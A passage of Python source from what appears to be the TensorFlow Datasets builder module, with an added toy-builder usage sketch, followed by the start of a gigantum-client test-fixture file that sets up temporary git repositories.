"Trying to overwrite an existing dataset {} at {}. A dataset with "
"the same version {} already exists. If the dataset has changed, "
"please update the version number.".format(self.name, self._data_dir,
self.version))
logging.info("Generating dataset %s (%s)", self.name, self._data_dir)
if not utils.has_sufficient_disk_space(
self.info.dataset_size + self.info.download_size,
directory=self._data_dir_root):
print(
"Not enough disk space. Needed: {} (download: {}, generated: {})"
.format(
self.info.dataset_size + self.info.download_size,
self.info.download_size,
self.info.dataset_size,
))
self._log_download_bytes()
dl_manager = self._make_download_manager(
download_dir=download_dir,
download_config=download_config,
)
# Maybe save the `builder_cls` metadata common to all builder configs.
if self.BUILDER_CONFIGS:
_save_default_config_name(
# `data_dir/ds_name/config/version/` -> `data_dir/ds_name/`
common_dir=self.data_path.parent.parent,
default_config_name=self.BUILDER_CONFIGS[0].name,
)
# Create a tmp dir and rename to self._data_dir on successful exit.
with utils.incomplete_dir(self._data_dir) as tmp_data_dir:
# Temporarily assign _data_dir to tmp_data_dir to avoid having to forward
# it to every sub function.
with utils.temporary_assignment(self, "_data_dir", tmp_data_dir):
if (download_config.try_download_gcs and
gcs_utils.is_dataset_on_gcs(self.info.full_name)):
logging.info(GCS_HOSTED_MSG, self.name)
gcs_utils.download_gcs_dataset(self.info.full_name, self._data_dir)
self.info.read_from_directory(self._data_dir)
else:
# Old version of TF are not os.PathLike compatible
with tf_compat.mock_gfile_pathlike():
self._download_and_prepare(
dl_manager=dl_manager,
download_config=download_config,
)
# NOTE: If modifying the lines below to put additional information in
# DatasetInfo, you'll likely also want to update
# DatasetInfo.read_from_directory to possibly restore these attributes
# when reading from package data.
# Skip statistics computation if tfdv isn't present
try:
import tensorflow_data_validation # pylint: disable=g-import-not-at-top,import-outside-toplevel,unused-import # pytype: disable=import-error
skip_stats_computation = False
except ImportError:
skip_stats_computation = True
splits = list(self.info.splits.values())
statistics_already_computed = bool(
splits and splits[0].statistics.num_examples)
# Update DatasetInfo metadata by computing statistics from the data.
if (
skip_stats_computation
or download_config.compute_stats == download.ComputeStatsMode.SKIP
or download_config.compute_stats == download.ComputeStatsMode.AUTO
and statistics_already_computed
):
pass
else: # Mode is forced or stats do not exists yet
logging.info("Computing statistics.")
self.info.compute_dynamic_properties()
self.info.download_size = dl_manager.downloaded_size
# Write DatasetInfo to disk, even if we haven't computed statistics.
self.info.write_to_directory(self._data_dir)
self._log_download_done()
def as_dataset(
self,
split=None,
*,
batch_size=None,
shuffle_files=False,
decoders=None,
read_config=None,
as_supervised=False,
):
# pylint: disable=line-too-long
"""Constructs a `tf.data.Dataset`.
Callers must pass arguments as keyword arguments.
The output types vary depending on the parameters. Examples:
```python
builder = tfds.builder('imdb_reviews')
builder.download_and_prepare()
# Default parameters: Returns the dict of tf.data.Dataset
ds_all_dict = builder.as_dataset()
assert isinstance(ds_all_dict, dict)
print(ds_all_dict.keys()) # ==> ['test', 'train', 'unsupervised']
assert isinstance(ds_all_dict['test'], tf.data.Dataset)
# Each dataset (test, train, unsup.) consists of dictionaries
# {'label': <tf.Tensor: .. dtype=int64, numpy=1>,
# 'text': <tf.Tensor: .. dtype=string, numpy=b"I've watched the movie ..">}
# {'label': <tf.Tensor: .. dtype=int64, numpy=1>,
# 'text': <tf.Tensor: .. dtype=string, numpy=b'If you love Japanese ..'>}
# With as_supervised: tf.data.Dataset only contains (feature, label) tuples
ds_all_supervised = builder.as_dataset(as_supervised=True)
assert isinstance(ds_all_supervised, dict)
print(ds_all_supervised.keys()) # ==> ['test', 'train', 'unsupervised']
assert isinstance(ds_all_supervised['test'], tf.data.Dataset)
# Each dataset (test, train, unsup.) consists of tuples (text, label)
# (<tf.Tensor: ... dtype=string, numpy=b"I've watched the movie ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# (<tf.Tensor: ... dtype=string, numpy=b"If you love Japanese ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# Same as above plus requesting a particular split
ds_test_supervised = builder.as_dataset(as_supervised=True, split='test')
assert isinstance(ds_test_supervised, tf.data.Dataset)
# The dataset consists of tuples (text, label)
# (<tf.Tensor: ... dtype=string, numpy=b"I've watched the movie ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# (<tf.Tensor: ... dtype=string, numpy=b"If you love Japanese ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
```
Args:
split: Which split of the data to load (e.g. `'train'`, `'test'`,
`['train', 'test']`, `'train[80%:]'`,...). See our
[split API guide](https://www.tensorflow.org/datasets/splits).
If `None`, will return all splits in a `Dict[Split, tf.data.Dataset]`.
batch_size: `int`, batch size. Note that variable-length features will
be 0-padded if `batch_size` is set. Users that want more custom behavior
should use `batch_size=None` and use the `tf.data` API to construct a
custom pipeline. If `batch_size == -1`, will return feature
dictionaries of the whole dataset with `tf.Tensor`s instead of a
`tf.data.Dataset`.
shuffle_files: `bool`, whether to shuffle the input files. Defaults to
`False`.
decoders: Nested dict of `Decoder` objects which allow to customize the
decoding. The structure should match the feature structure, but only
customized feature keys need to be present. See
[the guide](https://github.com/tensorflow/datasets/tree/master/docs/decode.md)
for more info.
read_config: `tfds.ReadConfig`, Additional options to configure the
input pipeline (e.g. seed, num parallel reads,...).
as_supervised: `bool`, if `True`, the returned `tf.data.Dataset`
will have a 2-tuple structure `(input, label)` according to
`builder.info.supervised_keys`. If `False`, the default,
the returned `tf.data.Dataset` will have a dictionary with all the
features.
Returns:
`tf.data.Dataset`, or if `split=None`, `dict<key: tfds.Split, value:
tfds.data.Dataset>`.
If `batch_size` is -1, will return feature dictionaries containing
the entire dataset in `tf.Tensor`s instead of a `tf.data.Dataset`.
"""
# pylint: enable=line-too-long
logging.info("Constructing tf.data.Dataset for split %s, from %s",
split, self._data_dir)
if not tf.io.gfile.exists(self._data_dir):
raise AssertionError(
("Dataset %s: could not find data in %s. Please make sure to call "
"dataset_builder.download_and_prepare(), or pass download=True to "
"tfds.load() before trying to access the tf.data.Dataset object."
) % (self.name, self._data_dir_root))
# By default, return all splits
if split is None:
split = {s: s for s in self.info.splits}
read_config = read_config or read_config_lib.ReadConfig()
# Create a dataset for each of the given splits
build_single_dataset = functools.partial(
self._build_single_dataset,
shuffle_files=shuffle_files,
batch_size=batch_size,
decoders=decoders,
read_config=read_config,
as_supervised=as_supervised,
)
datasets = utils.map_nested(build_single_dataset, split, map_tuple=True)
return datasets
def _build_single_dataset(
self,
split,
shuffle_files,
batch_size,
decoders,
read_config,
as_supervised,
):
"""as_dataset for a single split."""
wants_full_dataset = batch_size == -1
if wants_full_dataset:
batch_size = self.info.splits.total_num_examples or sys.maxsize
# Build base dataset
ds = self._as_dataset(
split=split,
shuffle_files=shuffle_files,
decoders=decoders,
read_config=read_config,
)
# Auto-cache small datasets which are small enough to fit in memory.
if self._should_cache_ds(
split=split,
shuffle_files=shuffle_files,
read_config=read_config
):
ds = ds.cache()
if batch_size:
# Use padded_batch so that features with unknown shape are supported.
ds = ds.padded_batch(
batch_size, tf.compat.v1.data.get_output_shapes(ds))
if as_supervised:
if not self.info.supervised_keys:
raise ValueError(
"as_supervised=True but %s does not support a supervised "
"(input, label) structure." % self.name)
input_f, target_f = self.info.supervised_keys
ds = ds.map(lambda fs: (fs[input_f], fs[target_f]))
# Add prefetch by default
if not read_config.skip_prefetch:
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
# If shuffling is True and seeds not set, allow pipeline to be
# non-deterministic
    # This code should probably be moved inside tfreader, so that
    # all the tf.data.Options are centralized in a single place.
if (shuffle_files and
read_config.options.experimental_deterministic is None and
read_config.shuffle_seed is None):
options = tf.data.Options()
options.experimental_deterministic = False
ds = ds.with_options(options)
    # If shuffle is False, keep the default value (deterministic), which
    # allows the user to overwrite it.
if wants_full_dataset:
return tf.data.experimental.get_single_element(ds)
return ds
def _should_cache_ds(self, split, shuffle_files, read_config):
"""Returns True if TFDS should auto-cache the dataset."""
# The user can explicitly opt-out from auto-caching
if not read_config.try_autocache:
return False
# Skip datasets with unknown size.
    # Even a heuristic based on `download_size` and
    # `MANUAL_DOWNLOAD_INSTRUCTIONS` wouldn't catch datasets which hardcode
    # the non-processed data-dir, nor DatasetBuilders that are not based on tf-record.
if not self.info.dataset_size:
return False
# Do not cache big datasets
# Instead of using the global size, we could infer the requested bytes:
# `self.info.splits[split].num_bytes`
# The info is available for full splits, and could be approximated
# for subsplits `train[:50%]`.
# However if the user is creating multiple small splits from a big
    # dataset, those could add up and fill up the entire RAM.
    # 250 MiB is arbitrarily picked. For comparison, Cifar10 is about 150 MiB.
if self.info.dataset_size > 250 * units.MiB:
return False
    # We do not want to cache data which has more than one shard when
    # shuffling is enabled, as this would effectively disable shuffling.
# An exception is for single shard (as shuffling is a no-op).
# Another exception is if reshuffle is disabled (shuffling already cached)
num_shards = len(self.info.splits[split].file_instructions)
if (shuffle_files and
# Shuffling only matter when reshuffle is True or None (default)
read_config.shuffle_reshuffle_each_iteration is not False and # pylint: disable=g-bool-id-comparison
num_shards > 1):
return False
# If the dataset satisfy all the right conditions, activate autocaching.
return True
def _relative_data_dir(self, with_version=True):
"""Relative path of this dataset in data_dir."""
builder_data_dir = self.name
builder_config = self._builder_config
if builder_config:
builder_data_dir = os.path.join(builder_data_dir, builder_config.name)
if not with_version:
return builder_data_dir
version_data_dir = os.path.join(builder_data_dir, str(self._version))
return version_data_dir
def _build_data_dir(self, given_data_dir):
"""Return the data directory for the current version.
Args:
given_data_dir: `Optional[str]`, root `data_dir` passed as
`__init__` argument.
Returns:
data_dir_root: `str`, The root dir containing all datasets, downloads,...
data_dir: `str`, The version data_dir
(e.g. `<data_dir_root>/<ds_name>/<config>/<version>`)
"""
builder_dir = self._relative_data_dir(with_version=False)
version_dir = self._relative_data_dir(with_version=True)
default_data_dir = constants.get_default_data_dir(
given_data_dir=given_data_dir
)
all_data_dirs = constants.list_data_dirs(given_data_dir=given_data_dir)
all_versions = set()
requested_version_dirs = {}
for data_dir_root in all_data_dirs:
# List all existing versions
full_builder_dir = os.path.join(data_dir_root, builder_dir)
data_dir_versions = set(utils.version.list_all_versions(full_builder_dir))
      # Check for existence of the requested version
if self.version in data_dir_versions:
requested_version_dirs[data_dir_root] = os.path.join(
data_dir_root, version_dir
)
all_versions.update(data_dir_versions)
if len(requested_version_dirs) > 1:
raise ValueError(
"Dataset was found in more than one directory: {}. Please resolve "
"the ambiguity by explicitly specifying `data_dir=`."
"".format(requested_version_dirs.values())
)
elif len(requested_version_dirs) == 1: # The dataset is found once
return next(iter(requested_version_dirs.items()))
# No dataset found, use default directory
data_dir = os.path.join(default_data_dir, version_dir)
if all_versions:
logging.warning(
"Found a different version of the requested dataset:\n"
"%s\n"
"Using %s instead.",
"\n".join(str(v) for v in sorted(all_versions)),
data_dir
)
return default_data_dir, data_dir
def _log_download_done(self):
msg = (f"Dataset {self.name} downloaded and prepared to {self._data_dir}. "
"Subsequent calls will reuse this data.")
termcolor.cprint(msg, attrs=["bold"])
def _log_download_bytes(self):
# Print is intentional: we want this to always go to stdout so user has
# information needed to cancel download/preparation if needed.
# This comes right before the progress bar.
termcolor.cprint(
f"Downloading and preparing dataset {self.info.download_size} "
f"(download: {self.info.download_size}, "
f"generated: {self.info.dataset_size}, "
f"total: {self.info.download_size + self.info.dataset_size}) "
f"to {self._data_dir}...",
attrs=["bold"],
)
@abc.abstractmethod
@utils.docs.doc_private
def _info(self):
"""Returns the `tfds.core.DatasetInfo` object.
This function is called once and the result is cached for all
following calls.
Returns:
dataset_info: The dataset metadata.
"""
raise NotImplementedError
@abc.abstractmethod
def _download_and_prepare(self, dl_manager, download_config=None):
"""Downloads and prepares dataset for reading.
Internal implementation to overwrite when inheriting from DatasetBuilder.
Called when `builder.download_and_prepare` is called.
It should download all required data and generate
the pre-processed datasets files.
Args:
dl_manager: `tfds.download.DownloadManager` used to download and cache
data.
download_config: `DownloadConfig`, Additional options.
"""
raise NotImplementedError
@abc.abstractmethod
def _as_dataset(
self, split, decoders=None, read_config=None, shuffle_files=False):
"""Constructs a `tf.data.Dataset`.
Internal implementation to overwrite when inheriting from DatasetBuilder.
Called when `builder.as_dataset` is called.
It should read the pre-processed datasets files and generate
the `tf.data.Dataset` object.
Args:
split: `tfds.Split` which subset of the data to read.
decoders: Nested structure of `Decoder` object to customize the dataset
decoding.
read_config: `tfds.ReadConfig`
shuffle_files: `bool`, whether to shuffle the input files. Optional,
defaults to `False`.
Returns:
`tf.data.Dataset`
"""
raise NotImplementedError
def _make_download_manager(self, download_dir, download_config):
"""Creates a new download manager object."""
download_dir = (
download_dir or os.path.join(self._data_dir_root, "downloads")
)
extract_dir = (
download_config.extract_dir or os.path.join(download_dir, "extracted")
)
manual_dir = (
download_config.manual_dir or os.path.join(download_dir, "manual")
)
if download_config.register_checksums:
# Note: Error will be raised here if user try to record checksums
# from a `zipapp`
register_checksums_path = utils.to_write_path(self._checksums_path)
else:
register_checksums_path = None
return download.DownloadManager(
download_dir=download_dir,
extract_dir=extract_dir,
manual_dir=manual_dir,
url_infos=self.url_infos,
manual_dir_instructions=self.MANUAL_DOWNLOAD_INSTRUCTIONS,
force_download=(download_config.download_mode == FORCE_REDOWNLOAD),
force_extraction=(download_config.download_mode == FORCE_REDOWNLOAD),
force_checksums_validation=download_config.force_checksums_validation,
register_checksums=download_config.register_checksums,
register_checksums_path=register_checksums_path,
verify_ssl=download_config.verify_ssl,
dataset_name=self.name,
)
@property
def builder_config(self):
"""`tfds.core.BuilderConfig` for this builder."""
return self._builder_config
def _create_builder_config(self, builder_config):
"""Create and validate BuilderConfig object."""
if builder_config is None and self.BUILDER_CONFIGS:
builder_config = self.BUILDER_CONFIGS[0]
logging.info("No config specified, defaulting to first: %s/%s", self.name,
builder_config.name)
if not builder_config:
return None
if isinstance(builder_config, six.string_types):
name = builder_config
builder_config = self.builder_configs.get(name)
if builder_config is None:
raise ValueError("BuilderConfig %s not found. Available: %s" %
(name, list(self.builder_configs.keys())))
name = builder_config.name
if not name:
raise ValueError("BuilderConfig must have a name, got %s" % name)
is_custom = name not in self.builder_configs
if is_custom:
logging.warning("Using custom data configuration %s", name)
else:
if builder_config is not self.builder_configs[name]:
raise ValueError(
"Cannot name a custom BuilderConfig the same as an available "
"BuilderConfig. Change the name. Available BuilderConfigs: %s" %
(list(self.builder_configs.keys())))
return builder_config
@utils.classproperty
@classmethod
@utils.memoize()
def builder_configs(cls):
"""Pre-defined list of configurations for this builder class."""
config_dict = {config.name: config for config in cls.BUILDER_CONFIGS}
if len(config_dict) != len(cls.BUILDER_CONFIGS):
names = [config.name for config in cls.BUILDER_CONFIGS]
raise ValueError(
"Names in BUILDER_CONFIGS must not be duplicated. Got %s" % names)
return config_dict
class FileReaderBuilder(DatasetBuilder):
"""Base class for datasets reading files.
Subclasses are:
* `GeneratorBasedBuilder`: Can both generate and read generated dataset.
* `ReadOnlyBuilder`: Can only read pre-generated datasets. A user can
generate a dataset with `GeneratorBasedBuilder`, and read them with
`ReadOnlyBuilder` without requiring the original generation code.
"""
def __init__(
self,
*,
file_format: Union[
None, str,
file_adapters.FileFormat] = file_adapters.DEFAULT_FILE_FORMAT,
**kwargs: Any):
"""Initializes an instance of FileReaderBuilder.
Callers must pass arguments as keyword arguments.
Args:
file_format: EXPERIMENTAL, may change at any time; Format of the record
files in which dataset will be read/written to. Defaults to `tfrecord`.
**kwargs: Arguments passed to `DatasetBuilder`.
"""
super().__init__(**kwargs)
try:
self._file_format = file_adapters.FileFormat(file_format)
except ValueError:
all_values = [f.value for f in file_adapters.FileFormat]
raise ValueError(f"{file_format} is not a valid format. "
f"Valid file formats: {all_values}")
@utils.memoized_property
def _example_specs(self):
return self.info.features.get_serialized_info()
@property
def _tfrecords_reader(self):
return tfrecords_reader.Reader(self._data_dir, self._example_specs,
self._file_format)
def _as_dataset(
self,
split=splits_lib.Split.TRAIN,
decoders=None,
read_config=None,
shuffle_files=False,
) -> tf.data.Dataset:
decode_fn = functools.partial(
self.info.features.decode_example, decoders=decoders
)
return self._tfrecords_reader.read(
name=self.name,
instructions=split,
split_infos=self.info.splits.values(),
decode_fn=decode_fn,
read_config=read_config,
shuffle_files=shuffle_files,
)
class GeneratorBasedBuilder(FileReaderBuilder):
"""Base class for datasets with data generation based on file adapter.
`GeneratorBasedBuilder` is a convenience class that abstracts away much
of the data writing and reading of `DatasetBuilder`.
  It expects subclasses to overwrite `_split_generators` to return a dict
  mapping split names to example generators. See the method docstrings for details.
"""
@abc.abstractmethod
@utils.docs.do_not_doc_in_subclasses
@utils.docs.doc_private
def _split_generators(
self,
dl_manager: download.DownloadManager,
) -> Dict[splits_lib.Split, split_builder_lib.SplitGenerator]:
"""Downloads the data and returns dataset splits with associated examples.
Example:
```python
def _split_generators(self, dl_manager):
path = dl_manager.download_and_extract('http://dataset.org/my_data.zip')
return {
'train': self._generate_examples(path=path / 'train_imgs'),
'test': self._generate_examples(path=path / 'test_imgs'),
}
```
    * If the original dataset does not have predefined `train`, `test`,... splits,
      this function should only return a single `train` split here. Users can
use the [subsplit API](https://www.tensorflow.org/datasets/splits) to
create subsplits (e.g.
`tfds.load(..., split=['train[:75%]', 'train[75%:]'])`).
* `tfds.download.DownloadManager` caches downloads, so calling `download`
      on the same url multiple times only downloads it once.
* A good practice is to download all data in this function, and have all the
computation inside `_generate_examples`.
    * Splits are generated in the order defined here. `builder.info.splits` keeps
the same order.
* This function can have an extra `pipeline` kwarg only if some
beam preprocessing should be shared across splits. In this case,
a dict of `beam.PCollection` should be returned.
See `_generate_example` for details.
Args:
dl_manager: `tfds.download.DownloadManager` used to download/extract the
data
Returns:
The dict of split name, generators. See `_generate_examples` for details
about the generator format.
"""
raise NotImplementedError()
@abc.abstractmethod
@utils.docs.do_not_doc_in_subclasses
@utils.docs.doc_private
def _generate_examples(
self, **kwargs: Any
) -> split_builder_lib.SplitGenerator:
"""Default function to generate examples for each split.
The function should return a collection of `(key, examples)`. Examples
    will be encoded and written to disk. See the `Yields` section for details.
The function can return/yield:
* A python generator:
```python
def _generate_examples(self, path):
for filepath in path.iterdir():
yield filepath.name, {'image': ..., 'label': ...}
```
* A `beam.PTransform` of (input_types: [] -> output_types: `KeyExample`):
For big datasets and distributed generation. See our Apache Beam
[datasets guide](https://www.tensorflow.org/datasets/beam_datasets)
for more info.
```python
def _generate_examples(self, path):
return (
beam.Create(path.iterdir())
| beam.Map(lambda filepath: filepath.name, {'image': ..., ...})
)
```
* A `beam.PCollection`: This should only be used if you need to share some
      distributed processing across splits. In this case, you can use the
following pattern:
```python
def _split_generators(self, dl_manager, pipeline):
...
# Distributed processing shared across splits
pipeline |= beam.Create(path.iterdir())
pipeline |= 'SharedPreprocessing' >> beam.Map(_common_processing)
...
# Wrap the pipeline inside a ptransform_fn to add `'label' >> ` and avoid
# duplicated PTransform nodes names.
generate_examples = beam.ptransform_fn(self._generate_examples)
return {
'train': pipeline | 'train' >> generate_examples(is_train=True)
'test': pipeline | 'test' >> generate_examples(is_train=False)
}
def _generate_examples(self, pipeline, is_train: bool):
return pipeline | beam.Map(_split_specific_processing, is_train=is_train)
```
    Note: Each split should use a different tag name (e.g.
`'train' >> generate_examples(path)`). Otherwise Beam will raise
duplicated name error.
Args:
**kwargs: Arguments from the `_split_generators`
Yields:
key: `str` or `int`, a unique deterministic example identification key.
        * Unique: An error will be raised if two examples are yielded with the
same key.
* Deterministic: When generating the dataset twice, the same example
should have the same key.
Good keys can be the image id, or line number if examples are extracted
from a text file.
The key will be hashed and sorted to shuffle examples deterministically,
        so that generating the dataset multiple times keeps examples in the
same order.
example: `dict<str feature_name, feature_value>`, a feature dictionary
ready to be encoded and written to disk. The example will be
encoded with `self.info.features.encode_example({...})`.
"""
raise NotImplementedError()
def _download_and_prepare(
self,
dl_manager: download.DownloadManager,
download_config: download.DownloadConfig,
) -> None:
"""Generate all splits and returns the computed split infos."""
split_builder = split_builder_lib.SplitBuilder(
split_dict=self.info.splits,
features=self.info.features,
max_examples_per_split=download_config.max_examples_per_split,
beam_options=download_config.beam_options,
beam_runner=download_config.beam_runner,
file_format=self._file_format,
)
# Wrap the generation inside a context manager.
# If `beam` is used during generation (when a pipeline gets created),
# the context manager is equivalent to `with beam.Pipeline()`.
# Otherwise, this is a no-op.
# By auto-detecting Beam, the user only has to change `_generate_examples`
# to go from non-beam to beam dataset:
# https://www.tensorflow.org/datasets/beam_datasets#instructions
with split_builder.maybe_beam_pipeline():
# If the signature has a `pipeline` kwargs, create the pipeline now and
# forward it to `self._split_generators`
      # We add this magic because the `pipeline` kwarg is only used by c4 and
# we do not want to make the API more verbose for a single advanced case.
signature = inspect.signature(self._split_generators)
if "pipeline" in signature.parameters.keys():
optional_pipeline_kwargs = dict(pipeline=split_builder.beam_pipeline)
else:
optional_pipeline_kwargs = {}
split_generators = self._split_generators( # pylint: disable=unexpected-keyword-arg
dl_manager, **optional_pipeline_kwargs
)
# TODO(tfds): Could be removed once all datasets are migrated.
# https://github.com/tensorflow/datasets/issues/2537
# Legacy mode (eventually convert list[SplitGeneratorLegacy] -> dict)
split_generators = split_builder.normalize_legacy_split_generators(
split_generators=split_generators,
generator_fn=self._generate_examples,
is_beam=isinstance(self, BeamBasedBuilder),
)
# Ensure `all` isn't used as key.
_check_split_names(split_generators.keys())
      # The writer fails if the number of examples yielded is `0`, so we return here.
if download_config.max_examples_per_split == 0:
return
# Start generating data for all splits
path_suffix = file_adapters.ADAPTER_FOR_FORMAT[
self._file_format].FILE_SUFFIX
split_info_futures = [
split_builder.submit_split_generation( # pylint: disable=g-complex-comprehension
split_name=split_name,
generator=generator,
path=self.data_path / f"{self.name}-{split_name}.{path_suffix}",
)
for split_name, generator
in utils.tqdm(
split_generators.items(),
desc="Generating splits...",
unit=" splits",
leave=False,
)
]
# Finalize the splits (after apache beam completed, if it was used)
split_infos = [future.result() for future in split_info_futures]
# Update the info object with the splits.
split_dict = splits_lib.SplitDict(split_infos, dataset_name=self.name)
self.info.set_splits(split_dict)
@utils.docs.deprecated
class BeamBasedBuilder(GeneratorBasedBuilder):
"""Beam based Builder.
DEPRECATED: Please use `tfds.core.GeneratorBasedBuilder` instead.
"""
def _generate_examples(
self, *args: Any, **kwargs: Any
) -> split_builder_lib.SplitGenerator:
return self._build_pcollection(*args, **kwargs)
def _check_split_names(split_names: Iterable[str]) -> None:
"""Check that split names are valid."""
if "all" in set(str(s).lower() for s in split_names):
raise ValueError(
"`all` is a reserved keyword. Split cannot be named like this."
)
def _save_default_config_name(
common_dir: ReadWritePath,
*,
default_config_name: str,
) -> None:
"""Saves `builder_cls` metadata (common to all builder configs)."""
data = {
"default_config_name": default_config_name,
}
# `data_dir/ds_name/config/version/` -> `data_dir/ds_name/.config`
config_dir = common_dir / ".config"
config_dir.mkdir(parents=True, exist_ok=True)
# Note:
# * Save inside a dir to support some replicated filesystem
# * Write inside a `.incomplete` file and rename to avoid multiple configs
  #   writing the same file concurrently
# * Config file is overwritten each time a config is generated. If the
# default config is changed, this will be updated.
config_path = config_dir / "metadata.json"
with utils.incomplete_file(config_path) as tmp_config_path:
tmp_config_path.write_text(json.dumps(data))
def load_default_config_name(
common_dir: ReadOnlyPath,
) -> Optional[str]:
"""Load `builder_cls` metadata (common to all builder configs)."""
config_path = common_dir / ".config/metadata.json"
if not config_path.exists():
return None
data = json.loads(config_path.read_text())
return data.get("default_config_name")
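# --- Hedged usage sketch (editor addition, standalone illustration). ---
# A minimal `GeneratorBasedBuilder` subclass showing the `_info` /
# `_split_generators` / `_generate_examples` contract documented above.
# The dataset name, download URL, feature names and labels are all made up.
import tensorflow_datasets as tfds


class MyToyDataset(tfds.core.GeneratorBasedBuilder):
  """Toy text-classification dataset used only to illustrate the builder API."""

  VERSION = tfds.core.Version("1.0.0")
  RELEASE_NOTES = {"1.0.0": "Initial release."}

  def _info(self) -> tfds.core.DatasetInfo:
    return tfds.core.DatasetInfo(
        builder=self,
        description="Illustrative toy dataset.",
        features=tfds.features.FeaturesDict({
            "text": tfds.features.Text(),
            "label": tfds.features.ClassLabel(names=["neg", "pos"]),
        }),
        supervised_keys=("text", "label"),
    )

  def _split_generators(self, dl_manager: tfds.download.DownloadManager):
    # Placeholder URL; `download_and_extract` caches and returns a path object.
    path = dl_manager.download_and_extract("http://example.com/toy_data.zip")
    return {
        "train": self._generate_examples(path / "train"),
        "test": self._generate_examples(path / "test"),
    }

  def _generate_examples(self, path):
    # Yields (key, example) pairs; keys must be unique and deterministic.
    for file in path.glob("*.txt"):
      yield file.name, {"text": file.read_text(), "label": "pos"}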
| 39.223821
| 154
| 0.691129
|
56ca498cec1c047b8bf0f3c8e3b13290e6207c10
| 57,029
|
py
|
Python
|
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 FlashX, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
from typing import Any
import tempfile
import os
import shutil
import uuid
import datetime
from gtmcore.gitlib import GitFilesystem, GitFilesystemShimmed, GitAuthor
from git import Repo
from git.exc import GitCommandError
def get_backend():
return os.environ['GITLIB_FS_BACKEND']
def get_fs_class():
if get_backend() == 'filesystem':
return GitFilesystem
elif get_backend() == 'filesystem-shim':
return GitFilesystemShimmed
else:
raise NotImplementedError('Invalid FS class')
# Required Fixtures:
# - mock_config: a standard config with an empty working dir
# - mock_initialized: a gitlib instance initialized with an empty repo
# - mock_initialized_remote: a gitlib instance initialized with an empty repo and create bare repo
# GitFilesystem Fixtures
@pytest.fixture()
def mock_config_filesystem():
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
yield config # provide the fixture value
# Force delete the directory
shutil.rmtree(working_dir)
@pytest.fixture()
def mock_initialized_filesystem():
"""Create an initialized git lib instance
Returns:
(gitlib.git.GitRepoInterface, str): the instance, the working dir
"""
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
# Init the empty repo
create_dummy_repo(working_dir)
git = get_fs_class()(config)
yield git, working_dir # provide the fixture value
# Force delete the directory
shutil.rmtree(working_dir)
@pytest.fixture()
def mock_initialized_filesystem_with_remote():
"""Create an initialized git lib instance and also create a bare initialized repo
returns a clone of the repo on master, the working dir for that repo, the bare repo, and the working bare dir
Returns:
(gitlib.git.GitRepoInterface, str, gitlib.git.GitRepoInterface, str)
"""
# Create temporary working directory for the bare repo
bare_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(bare_working_dir)
bare_repo = Repo.init(bare_working_dir, bare=True)
populate_bare_repo(bare_working_dir)
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.clone(bare_working_dir)
yield git, working_dir, bare_repo, bare_working_dir # provide the fixture value
# Force delete the directory
shutil.rmtree(bare_working_dir)
shutil.rmtree(working_dir)
def populate_bare_repo(working_dir):
"""Method to populate the bare repo with a branch, files, and tag"""
# Create a local repo so we can manipulate the remote
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.clone(working_dir)
# Add a file to master and commit
write_file(git, "test1.txt", "Original Content", commit_msg="initial commit")
git.repo.remotes.origin.push()
# Create a branch from master
new_branch = git.repo.create_head("test_branch", git.repo.refs.master)
git.repo.head.set_reference(new_branch)
write_file(git, "test2.txt", "Original Content", commit_msg="second commit")
git.repo.remotes.origin.push("test_branch")
# Tag
tag = git.repo.create_tag("test_tag_1", message="a test tag")
git.repo.remotes.origin.push(tag)
# Check master back out
git.repo.heads.master.checkout()
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def create_dummy_repo(working_dir):
"""Helper method to create a dummy repo with a file in it"""
filename = "dummy.txt"
repo = Repo.init(working_dir)
with open(os.path.join(working_dir, filename), 'wt') as dt:
dt.write("entry 1")
repo.index.add([os.path.join(working_dir, filename)])
repo.index.commit("initial commit")
def write_file(git_instance, filename, content, add=True, commit_msg=None):
"""Write content to a file
Args:
filename(str): The relative file path from the working dir
